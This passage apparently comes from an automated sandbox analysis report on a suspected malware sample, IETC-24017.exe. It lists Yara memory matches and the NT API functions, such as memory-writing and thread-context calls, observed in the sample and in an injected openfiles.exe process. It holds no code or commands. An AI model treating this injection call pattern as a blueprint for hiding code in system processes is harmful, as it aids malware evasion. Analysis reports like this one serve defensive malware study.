                      Source: Yara matchFile source: 00000006.00000002.4124804278.0000000004D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1824149461.0000000003920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0042C973 NtClose,3_2_0042C973
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842B60 NtClose,LdrInitializeThunk,3_2_01842B60
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01842DF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01842C70
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018435C0 NtCreateMutant,LdrInitializeThunk,3_2_018435C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01844340 NtSetContextThread,3_2_01844340
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01844650 NtSuspendThread,3_2_01844650
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842B80 NtQueryInformationFile,3_2_01842B80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842BA0 NtEnumerateValueKey,3_2_01842BA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842BE0 NtQueryValueKey,3_2_01842BE0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842BF0 NtAllocateVirtualMemory,3_2_01842BF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842AB0 NtWaitForSingleObject,3_2_01842AB0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842AD0 NtReadFile,3_2_01842AD0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842AF0 NtWriteFile,3_2_01842AF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842DB0 NtEnumerateKey,3_2_01842DB0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842DD0 NtDelayExecution,3_2_01842DD0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842D00 NtSetInformationFile,3_2_01842D00
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842D10 NtMapViewOfSection,3_2_01842D10
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842D30 NtUnmapViewOfSection,3_2_01842D30
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842CA0 NtQueryInformationToken,3_2_01842CA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842CC0 NtQueryVirtualMemory,3_2_01842CC0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842CF0 NtOpenProcess,3_2_01842CF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842C00 NtQueryInformationProcess,3_2_01842C00
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842C60 NtCreateKey,3_2_01842C60
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842F90 NtProtectVirtualMemory,3_2_01842F90
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842FA0 NtQuerySection,3_2_01842FA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842FB0 NtResumeThread,3_2_01842FB0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842FE0 NtCreateFile,3_2_01842FE0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842F30 NtCreateSection,3_2_01842F30
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842F60 NtCreateProcessEx,3_2_01842F60
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842E80 NtReadVirtualMemory,3_2_01842E80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842EA0 NtAdjustPrivilegesToken,3_2_01842EA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842EE0 NtQueueApcThread,3_2_01842EE0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842E30 NtWriteVirtualMemory,3_2_01842E30
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01843090 NtSetValueKey,3_2_01843090
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01843010 NtOpenDirectoryObject,3_2_01843010
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018439B0 NtGetContextThread,3_2_018439B0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01843D10 NtOpenProcessToken,3_2_01843D10
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01843D70 NtOpenThread,3_2_01843D70
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A4650 NtSuspendThread,LdrInitializeThunk,7_2_049A4650
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A4340 NtSetContextThread,LdrInitializeThunk,7_2_049A4340
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_049A2CA0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_049A2C70
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2C60 NtCreateKey,LdrInitializeThunk,7_2_049A2C60
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2DD0 NtDelayExecution,LdrInitializeThunk,7_2_049A2DD0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_049A2DF0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_049A2D10
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_049A2D30
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_049A2E80
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_049A2EE0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2FB0 NtResumeThread,LdrInitializeThunk,7_2_049A2FB0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2FE0 NtCreateFile,LdrInitializeThunk,7_2_049A2FE0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2F30 NtCreateSection,LdrInitializeThunk,7_2_049A2F30
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2AD0 NtReadFile,LdrInitializeThunk,7_2_049A2AD0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2AF0 NtWriteFile,LdrInitializeThunk,7_2_049A2AF0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_049A2BA0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_049A2BF0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_049A2BE0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2B60 NtClose,LdrInitializeThunk,7_2_049A2B60
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A35C0 NtCreateMutant,LdrInitializeThunk,7_2_049A35C0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A39B0 NtGetContextThread,LdrInitializeThunk,7_2_049A39B0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2CC0 NtQueryVirtualMemory,7_2_049A2CC0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2CF0 NtOpenProcess,7_2_049A2CF0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2C00 NtQueryInformationProcess,7_2_049A2C00
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2DB0 NtEnumerateKey,7_2_049A2DB0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2D00 NtSetInformationFile,7_2_049A2D00
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2EA0 NtAdjustPrivilegesToken,7_2_049A2EA0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2E30 NtWriteVirtualMemory,7_2_049A2E30
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2F90 NtProtectVirtualMemory,7_2_049A2F90
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2FA0 NtQuerySection,7_2_049A2FA0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2F60 NtCreateProcessEx,7_2_049A2F60
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2AB0 NtWaitForSingleObject,7_2_049A2AB0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2B80 NtQueryInformationFile,7_2_049A2B80
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A3090 NtSetValueKey,7_2_049A3090
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A3010 NtOpenDirectoryObject,7_2_049A3010
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A3D10 NtOpenProcessToken,7_2_049A3D10
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A3D70 NtOpenThread,7_2_049A3D70
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007B93A0 NtCreateFile,7_2_007B93A0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007B9510 NtReadFile,7_2_007B9510
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007B9610 NtDeleteFile,7_2_007B9610
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007B96C0 NtClose,7_2_007B96C0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007B9820 NtAllocateVirtualMemory,7_2_007B9820
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018128403_2_01812840
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F68B83_2_017F68B8
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C6BD73_2_018C6BD7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CAB403_2_018CAB40
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180EA803_2_0180EA80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01828DBF3_2_01828DBF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180ADE03_2_0180ADE0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181AD003_2_0181AD00
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018ACD1F3_2_018ACD1F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0CB53_2_018B0CB5
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01800CF23_2_01800CF2
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810C003_2_01810C00
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188EFA03_2_0188EFA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01802FC83_2_01802FC8
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01852F283_2_01852F28
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01830F303_2_01830F30
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B2F303_2_018B2F30
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01884F403_2_01884F40
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01822E903_2_01822E90
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CCE933_2_018CCE93
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CEEDB3_2_018CEEDB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CEE263_2_018CEE26
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810E593_2_01810E59
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FF1723_2_017FF172
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181B1B03_2_0181B1B0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018DB16B3_2_018DB16B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0184516C3_2_0184516C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018170C03_2_018170C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BF0CC3_2_018BF0CC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C70E93_2_018C70E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CF0E03_2_018CF0E0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0185739A3_2_0185739A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FD34C3_2_017FD34C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C132D3_2_018C132D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018152A03_2_018152A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182B2C03_2_0182B2C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B12ED3_2_018B12ED
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182D2F03_2_0182D2F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AD5B03_2_018AD5B0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C75713_2_018C7571
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CF43F3_2_018CF43F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018014603_2_01801460
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CF7B03_2_018CF7B0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C16CC3_2_018C16CC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A59103_2_018A5910
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018199503_2_01819950
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182B9503_2_0182B950
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018138E03_2_018138E0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187D8003_2_0187D800
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182FB803_2_0182FB80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01885BF03_2_01885BF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0184DBF93_2_0184DBF9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CFB763_2_018CFB76
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01855AA03_2_01855AA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018ADAAC3_2_018ADAAC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B1AA33_2_018B1AA3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BDAC63_2_018BDAC6
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CFA493_2_018CFA49
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C7A463_2_018C7A46
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01883A6C3_2_01883A6C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182FDC03_2_0182FDC0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01813D403_2_01813D40
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C1D5A3_2_018C1D5A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C7D733_2_018C7D73
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CFCF23_2_018CFCF2
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01889C323_2_01889C32
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01811F923_2_01811F92
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CFFB13_2_018CFFB1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CFF093_2_018CFF09
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01819EB03_2_01819EB0
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC0FFD6_2_07CC0FFD
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC0FF16_2_07CC0FF1
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC2E9D6_2_07CC2E9D
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC0EAD6_2_07CC0EAD
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC961D6_2_07CC961D
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC96186_2_07CC9618
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC7D8D6_2_07CC7D8D
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC2C7D6_2_07CC2C7D
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC2C756_2_07CC2C75
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CCB41D6_2_07CCB41D
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CE1AFD6_2_07CE1AFD
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC10C46_2_07CC10C4
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A1E4F67_2_04A1E4F6
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A144207_2_04A14420
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A224467_2_04A22446
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A305917_2_04A30591
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049705357_2_04970535
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0498C6E07_2_0498C6E0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496C7C07_2_0496C7C0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049947507_2_04994750
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049707707_2_04970770
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A020007_2_04A02000
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A301AA7_2_04A301AA
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A281CC7_2_04A281CC
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049601007_2_04960100
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A0A1187_2_04A0A118
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049F81587_2_049F8158
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049F02C07_2_049F02C0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A102747_2_04A10274
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A303E67_2_04A303E6
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0497E3F07_2_0497E3F0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2A3527_2_04A2A352
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A10CB57_2_04A10CB5
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04960CF27_2_04960CF2
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04970C007_2_04970C00
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04988DBF7_2_04988DBF
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496ADE07_2_0496ADE0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0497AD007_2_0497AD00
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A0CD1F7_2_04A0CD1F
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04982E907_2_04982E90
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2CE937_2_04A2CE93
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2EEDB7_2_04A2EEDB
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2EE267_2_04A2EE26
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04970E597_2_04970E59
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049EEFA07_2_049EEFA0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04962FC87_2_04962FC8
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A12F307_2_04A12F30
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04990F307_2_04990F30
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049B2F287_2_049B2F28
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049E4F407_2_049E4F40
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049568B87_2_049568B8
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0499E8F07_2_0499E8F0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049728407_2_04972840
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0497A8407_2_0497A840
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A3A9A67_2_04A3A9A6
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049729A07_2_049729A0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049869627_2_04986962
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496EA807_2_0496EA80
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A26BD77_2_04A26BD7
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2AB407_2_04A2AB40
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2F43F7_2_04A2F43F
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049614607_2_04961460
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A0D5B07_2_04A0D5B0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A275717_2_04A27571
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A216CC7_2_04A216CC
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2F7B07_2_04A2F7B0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2F0E07_2_04A2F0E0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A270E97_2_04A270E9
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049770C07_2_049770C0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A1F0CC7_2_04A1F0CC
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0497B1B07_2_0497B1B0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A3B16B7_2_04A3B16B
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0495F1727_2_0495F172
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A516C7_2_049A516C
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049752A07_2_049752A0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A112ED7_2_04A112ED
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0498B2C07_2_0498B2C0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0498D2F07_2_0498D2F0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049B739A7_2_049B739A
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2132D7_2_04A2132D
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0495D34C7_2_0495D34C
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2FCF27_2_04A2FCF2
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049E9C327_2_049E9C32
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0498FDC07_2_0498FDC0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A27D737_2_04A27D73
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04973D407_2_04973D40
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A21D5A7_2_04A21D5A
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04979EB07_2_04979EB0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04971F927_2_04971F92
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2FFB17_2_04A2FFB1
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04933FD27_2_04933FD2
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04933FD57_2_04933FD5
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2FF097_2_04A2FF09
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049738E07_2_049738E0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049DD8007_2_049DD800
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A059107_2_04A05910
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049799507_2_04979950
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0498B9507_2_0498B950
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A11AA37_2_04A11AA3
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A0DAAC7_2_04A0DAAC
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049B5AA07_2_049B5AA0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A1DAC67_2_04A1DAC6
